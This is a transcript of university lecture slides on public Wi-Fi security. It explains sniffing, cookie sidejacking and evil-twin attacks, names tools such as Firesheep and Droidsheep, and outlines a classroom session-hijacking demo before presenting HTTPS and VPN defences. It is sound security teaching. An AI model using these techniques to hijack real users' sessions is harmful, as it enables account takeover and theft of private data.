Presentation on theme: "Accessing Public Wi-Fi: Security Issues Sankar Roy Department of Computing and Information Sciences Kansas State University."— Presentation transcript:
Accessing Public Wi-Fi: Security Issues Sankar Roy Department of Computing and Information Sciences Kansas State University
Acknowledgement In preparing the presentation slides and the demo, I received help from Professor Simon Ou Professor Gurdip Singh Professor Eugene Vasserman Alex Bardas and Fengguo Wei 2
What is a public Wi-Fi? Provides a wireless access point (AP) via which your laptop or smart phone can connect to the Internet Wi-Fi hot spots are available in coffee shops, at airports, on KSU campus, in public libraries, etc.
More about a Public Wi-Fi Hotspot Note: Wi-Fi is a particular communication protocol (whose technical name is IEEE 802.11) The communication, is open in nature, i.e. any computer with an antenna in the region can communicate with the Access Point (AP). AP modem Internet
Some Issues of the Public Wi-Fi Wireless communication is essentially a broadcast one – A neighboring attacker can sniff (eavesdrop) all the data transmitted AP
More Issues of the Public Wi-Fi Why no encryption is employed in a public Wi-Fi? – It will become complex from the admin perspective – It will hurt the current plug and play feature. – Encryption does not help if everybody shares the password Why cant you use a secure Wi-Fi protocol yourself? – The network admin has to make the protocol available – You (the user) do not have the admin access of the AP.
Attack 1: Eavesdrop Communication The attacker might be able to mine out secret information (e.g. a users emails, password, banking details, etc.) from the sniffed communication. Available attack-tools: airPcap, wireshark, driftnet, urlsnarf, etc.
Background Knowledge for Attack 2 In some portals (e.g. Yahoo mail) the web session after successful login switches back to HTTP. The HTTP session is then authenticated only by a cookie. What is a cookie? – a login receipt containing the web session ID – The server can identify/authenticate the clients session by the cookie ID Problem: clients cookie can be stolen – (example) when the adversary does packet sniffing on the Wi-Fi network where the clients machine is Outcome: the HTTP session can be hijacked (also called sidejacked). 8
Attack 2: Sidejacking Web Sessions Now the attacker can impersonate the user e.g. on LinkedIn or Yahoo email, etc. Attack Tools: Firesheep, Droidsheep, etc. (1) After login, the victim sends requests to the web application using a cookie for authentication. (2) Because it is sent over HTTP, an adversary can eavesdrop it and capture the cookie. (3) the adversary uses this cookie to hijack the victims session. Acknowledgement: One-Time Cookies, GaTech.
Attack 3: Evil Twin It is basically a man-in-the-middle attack. It can be launched by tools such as HermesAP and OpenAP. The attacker node fools the user node to communicate with a fake AP, and hence redirects the traffic through itself. AP Fake AP
Firesheep: One Web Session Hijacking Tool The attack scenario: – an innocent user Alice accesses her Yahoo email or LinkedIn account using a public Wi-Fi at a hotspot (e.g. an airport) – a neighboring attacker Mallory (M) uses a Firefox add-on (Firesheep) on a laptop and sniffs the user Alices communication Firesheep automatically grabs the cookie of each of Alices insecure web sessions (i.e. HTTP sessions) With the above cookies, Firesheep automatically hijacks Alices web sessions
Insecure Web Portal Examples After login is done, Yahoo email switch to HTTP connection, i.e. secure (HTTPS) connections are no longer used. Same problem with Facebook if its HTTP version is used.
How Firesheep Add-on Looks on Firefox? Acknowledgement: Firesheep creator, Eric Butler
Attacker is Browsing Hijacked Sessions Acknowledgement: Firesheep creater, Mr. Butler
A Demo: Web Session Hijacking We will use the attack tool called Droidsheep which runs on an Android tablet. The attack scenario: – Alice accesses her Yahoo email or LinkedIn account in a public Wi-Fi hotspot – a neighboring attacker Mallory (M) is present there with an Android tablet with Droidsheep tool running. Droidsheep automatically grabs the cookie of each of Alices insecure web sessions and shows the list of sessions. Mallory can now hijack any of Alices web sessions just by a simple tap / click on the list shown on the tablet screen.
How to Counter the Attacks: the Basic Idea The user Alice establishes a secure communication channel with the remote end (R) of the communication (e.g. email server, bank server, etc.) The communication between Alice and R is encrypted. The attacker Mallory (M) cannot decrypt Alices data through sniffing. M cannot launch sidejacking attack; Evil Twin does not have any impact. R: email server Alice Mallory AP A Wi-Fi hotspot with a user and an attacker Secure comm. channel
Solution 1: Browse Secure Web Only We can avoid the above attacks if we access only the HTTPS-enabled web sites (e.g. Gmail but not the Yahoo email) Many web portals (e.g. Facebook, Tweeter) provide both HTTPS and HTTP options; you have to choose the HTTPS option. We discussed how to use HTTPS web browsing in the previous class.
Choose Secure Browsing in Facebook Fortunately, now the default option is HTTPS
Choose Secure Browsing in Tweeter Fortunately, now the default option is HTTPS
Solution 2: VPN (Virtual Private Network) Alice uses VPN to create a secure tunnel between her machine and the remote target (e.g. KSU) Alices machine needs to have a VPN client; target network also needs to have a VPN server e.g. vpn.net.k-state.edu for KSU S: VPN server Alice M AP A Wi-Fi hotspot with a user and an attacker M VPN tunnel R: target server The KSU network Internet
General Scenario: Multiple Target Servers Caution: VPN (split mode ) does not redirect your communication with all of the servers (e.g. Yahoo email server) through the VPN server. In split mode, only the traffic destined to the VPN servers network will be protected from the attacker M at the public Wi-Fi hotspot. KSU VPN server Alice M AP A Wi-Fi hotspot: user Alice is with Split Mode VPN VPN traffic R1: target server (e.g. KSU email) R2: target server(e.g. Yahoo) regular traffic
General Scenario: Multiple Target Servers VPN (full mode ) redirects your communication with all of the servers (including Yahoo email server) through the VPN server. In full mode, all the traffic destined to all the target servers will be protected from the attacker M at the public Wi-Fi hotspot. KSU VPN server Alice M AP A Wi-Fi hotspot: user Alice is with full mode VPN VPN traffic R1: target server(e.g. KSU email) R2: target server(e.g. Yahoo) VPN traffic Alice is at KSU
Setting up a VPN connection to KSU Install the Cisco VPN client in your machine from the ITS website (www.ksu.edu/its/security/vpn) Connect the VPN client with the KSU VPN server by providing your KSU eID and password. In both the full and split VPN options – VPN tunnel encrypts your traffic between your computer and the VPN server. – But, the traffic between the VPN server and the target server will NOT be encrypted, unless you are using SSL- enabled applications.
Managing Common Wi-Fi Settings Your laptop (or smartphone) may get connected automatically to a public Wi-Fi network if you have used the same network before The above can also happen if you have used a different network with the same name (SSID) before. How to avoid: change the default wireless network access policy of your laptop or smartphone
Similar Attacks to a Wired Network? Wired Ethernet network can be eavesdropped – If it is a network with a hub, then it builds a broadcast channel like a Wi-Fi network. So, sniffing is easy – If it is a network with a switch, then the attacker needs some additional step before being able to sniff So, similar attacks can be launched in a wired network where users access Internet via Ethernet cables in a public place. Note: this even applies to cable Internet connections at home.
Summary We discussed common security threats of using a public Wi-Fi hotspot We presented a few standard countermeasures to mitigate the risks Remainder: – the next homework is due before the next class (1pm on February 14) – the next class will be held in Room 127 38